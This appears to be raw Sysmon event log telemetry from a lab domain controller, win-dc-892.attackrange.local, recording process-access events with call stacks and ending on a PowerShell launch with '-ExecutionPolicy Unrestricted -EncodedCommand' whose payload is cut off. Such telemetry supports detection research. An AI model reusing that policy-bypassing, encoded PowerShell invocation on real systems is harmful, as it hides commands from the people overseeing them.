11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.355{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6438-6064-C402-00000000AD01}4332C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.355{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6438-6064-C402-00000000AD01}4332C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.355{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6438-6064-C402-00000000AD01}4332C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.356{266CAFBE-6438-6064-C402-00000000AD01}4332C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-62DA-6064-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.261{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.261{266CAFBE-62DA-6064-0A00-00000000AD01}8481120C:\Windows\system32\services.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:51.136{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:51.136{266CAFBE-62DA-6064-0A00-00000000AD01}848920C:\Windows\system32\services.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:51.127{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-62DA-6064-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{266CAFBE-62DA-6064-0A00-00000000AD01}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local2021-03-31 11:59:52.402Started13.014.50 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.887{266CAFBE-642D-6064-9002-00000000AD01}45804660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-642D-6064-8F02-00000000AD01}3868C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.809{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.793{266CAFBE-6439-6064-C702-00000000AD01}32081188C:\Windows\system32\cmd.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.798{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 